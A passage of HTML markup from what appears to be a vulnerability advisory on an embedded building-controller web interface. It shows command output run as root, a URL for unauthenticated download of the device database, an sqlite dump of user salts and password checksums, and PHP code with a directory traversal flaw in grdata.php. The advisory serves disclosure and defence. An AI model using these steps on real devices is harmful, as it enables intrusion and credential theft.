class=\"crayon-v\">PHPSESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">f694a07ca04f27cea0dffa9e6a44ade1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06d206476314-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06d206476314-15\"><span class=\"crayon-e\">root<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06d206476314-16\"><span class=\"crayon-e\">Linux <\/span><span class=\"crayon-v\">FG32<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2.6.29.2<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">V2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#36 Wed Nov 12 15:06:43 EST 2014 armv4tl unknown<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06d206476314-17\"><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">bacnet<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Timeout <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">out <\/span><span class=\"crayon-e\">of<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">43200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">range<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06d206476314-18\"><span class=\"crayon-v\">bacnet<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">php<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c06d206476314-19\"><span class=\"crayon-v\">deployment<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">php<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c06d206476314-20\"><span class=\"crayon-v\">os_info<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">php<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0033 seconds] -->  <\/p>\n<p><em><strong>Unauthenticated database file download<\/strong><\/em><br \/> The database file is not protected from direct download if the &#8220;right&#8221; URL is provided, the database file includes sensitive information, usernames and passwords as well as configuration settings of the remote device.<\/p>\n<p>The URL where the database is located at:<br \/> <em>http:\/\/192.168.0.16\/sdcard\/cpt\/app\/cpt-web.db<\/em><\/p>\n<p>Which when accessed will return the following content when loaded into sqlite:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb52c071080408374\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> sqlite&gt; .databases  seq name file   &#8212; &#8212;&#8212;&#8212;&#8212;&#8212; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-  0 main \/tmp\/cpt-web.db   1 temp   sqlite&gt; .tables  permissions users   sqlite&gt; .schema  CREATE TABLE users (  id INTEGER PRIMARY KEY AUTOINCREMENT,  name varchar(255) NOT NULL UNIQUE,  salt char(16) NOT NULL,  checksum char(56) NOT NULL,  is_admin char(1) DEFAULT &#8216;f&#8217;,  created_at datetime default current_timestamp  , utility_enabled char(1) DEFAULT &#8216;f&#8217;, home_page varchar(255), system_enabled char(1) DEFAULT &#8216;f&#8217;);  CREATE TABLE permissions (  id INTEGER PRIMARY KEY AUTOINCREMENT,  user_id INTEGER NOT NULL,  path varchar(255) NOT NULL,  readable char(1) DEFAULT &#8216;t&#8217;,  writable char(1) DEFAULT &#8216;t&#8217;,  created_at datetime default current_timestamp,  FOREIGN KEY(user_id) REFERENCES users(id)  );  sqlite&gt; select * from users;  1|admin|hNsq25I1KmRfSCOu|dc7b9f203aa5cf1bwe33d5fc126cd783f98595e9|t|1970-01-01 00:09:24|t||t  2|user|2PuRbt9ogdHGS10y|1b5ff0de0610cc42b27cg833d46eb798a1ff9f22|f|2015-03-16 05:47:00|f|Admin.gr|f<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c071080408374-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c071080408374-28\">28<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-1\"><span class=\"crayon-v\">sqlite<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">databases<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-2\"><span class=\"crayon-e\">seq <\/span><span class=\"crayon-e\">name <\/span><span class=\"crayon-v\">file<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-3\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-4\"><span class=\"crayon-cn\">0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">main<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cpt<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">web<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-i\">db<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-5\"><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">temp <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-6\"><span class=\"crayon-v\">sqlite<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tables<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-7\"><span class=\"crayon-e\">permissions <\/span><span class=\"crayon-e\">users <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-8\"><span class=\"crayon-v\">sqlite<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">schema<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-9\"><span class=\"crayon-e\">CREATE <\/span><span class=\"crayon-e\">TABLE <\/span><span class=\"crayon-e\">users<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-10\"><span class=\"crayon-e\">id <\/span><span class=\"crayon-t\">INTEGER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PRIMARY <\/span><span class=\"crayon-e\">KEY <\/span><span class=\"crayon-v\">AUTOINCREMENT<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-11\"><span class=\"crayon-e\">name <\/span><span class=\"crayon-e\">varchar<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">255<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">NOT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">UNIQUE<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-12\"><span class=\"crayon-e\">salt <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">NOT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-13\"><span class=\"crayon-e\">checksum <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">56<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">NOT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-14\"><span class=\"crayon-e\">is_admin <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">DEFAULT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;f&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-15\"><span class=\"crayon-e\">created_at <\/span><span class=\"crayon-e\">datetime <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">current<\/span><span class=\"crayon-sy\">_<\/span>timestamp<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-16\"><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">utility_enabled <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">DEFAULT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;f&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">home_page <\/span><span class=\"crayon-e\">varchar<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">255<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">system_enabled <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">DEFAULT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;f&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-17\"><span class=\"crayon-e\">CREATE <\/span><span class=\"crayon-e\">TABLE <\/span><span class=\"crayon-e\">permissions<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-18\"><span class=\"crayon-e\">id <\/span><span class=\"crayon-t\">INTEGER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PRIMARY <\/span><span class=\"crayon-e\">KEY <\/span><span class=\"crayon-v\">AUTOINCREMENT<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-19\"><span class=\"crayon-e\">user_id <\/span><span class=\"crayon-t\">INTEGER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">NOT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-20\"><span class=\"crayon-e\">path <\/span><span class=\"crayon-e\">varchar<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">255<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">NOT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-21\"><span class=\"crayon-e\">readable <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">DEFAULT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;t&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-22\"><span class=\"crayon-e\">writable <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">DEFAULT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;t&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-23\"><span class=\"crayon-e\">created_at <\/span><span class=\"crayon-e\">datetime <\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">current_timestamp<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-24\"><span class=\"crayon-e\">FOREIGN <\/span><span class=\"crayon-e\">KEY<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">user_id<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">REFERENCES <\/span><span class=\"crayon-e\">users<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-25\"><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-26\"><span class=\"crayon-v\">sqlite<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">select *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">users<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c071080408374-27\"><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">hNsq25I1KmRfSCOu<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">dc7b9f203aa5cf1bwe33d5fc126cd783f98595e9<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">1970<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-i\">t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c071080408374-28\"><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">user<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2PuRbt9ogdHGS10y<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">1b5ff0de0610cc42b27cg833d46eb798a1ff9f22<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-cn\">2015<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">05<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">47<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">Admin<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">gr<\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-v\">f<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0049 seconds] -->  <\/p>\n<p>&#8216;checksum&#8217; column is created based on the user supplied password and the &#8216;salt&#8217; (found in the salt column).<\/p>\n<p><em><strong>Authenticated directory traversal vulnerability<\/strong><\/em><br \/> <em><u>Vulnerable code<\/u>: grdata.php<\/em><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb52c074951174095\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> {&#8220;data&#8221;: &#8220;&lt;?php  \/\/vim: ts=2 sw=2    include_once &#8220;db.php&#8221;;  include_once &#8220;base_controller.php&#8221;;    class GrdataController extends BaseController {  \tprotected function signinRequired() {  \t\treturn true;  \t}    \tprotected function doAjaxGet() {  \t\t$response = array();  \t\t$_SESSION[&#8216;curGrPath&#8217;] = $_GET[&#8216;grName&#8217;];  \t\tif (!$this-&gt;isReadable()) {  \t\t\t$this-&gt;renderAjaxError($response, &#8220;permission denied&#8221;);  \t\t\t\/\/ $_SESSION[&#8216;flash&#8217;] = &#8220;permission denied&#8221;;  \t\t\t\/\/ $this-&gt;redirect($this-&gt;makeUrl(&#8220;app\/landing_page.php&#8221;));  \t\t}    \t\t$grName = $_GET[&#8216;grName&#8217;];  \t\t$file = file_get_contents(&#8216;.\/grdata\/&#8217; . $grName); \/\/vuln call to file_get_contents()  \t\tif ($file) {  \t\t\t$response[&#8216;data&#8217;] = $file;  \t\t\t$u = $this-&gt;curUser();  \t\t\t$response[&#8216;actionPermitted&#8217;] = $u-&gt;can(&#8216;write&#8217;, $_GET[&#8216;grName&#8217;]) ? &#8216;true&#8217; : &#8216;false&#8217;;  \t\t\tif (!$u-&gt;isAdmin())  \t\t\t\t$response[&#8216;grBlackList&#8217;] = implode(&#8220;,&#8221;, $u-&gt;grBlackList());  \t\t\t\t$response[&#8216;home_page&#8217;] = $u-&gt;attr(&#8216;home_page&#8217;);  \t\t\t\t$this-&gt;renderAjaxSuccess($response);  \t\t}   \t\telse {  \t\t\t$this-&gt;renderAjaxError($response, &#8220;failed to read data file: $grName&#8221;);  \t\t}  \t}  }    $controller = new GrdataController();  $controller-&gt;run();    ?&gt;  &#8220;,&#8221;actionPermitted&#8221;: &#8220;true&#8221;,&#8221;home_page&#8221;: &#8220;&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c074951174095-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c074951174095-12\">12<\/div>\n<div class=\"crayon-num\" 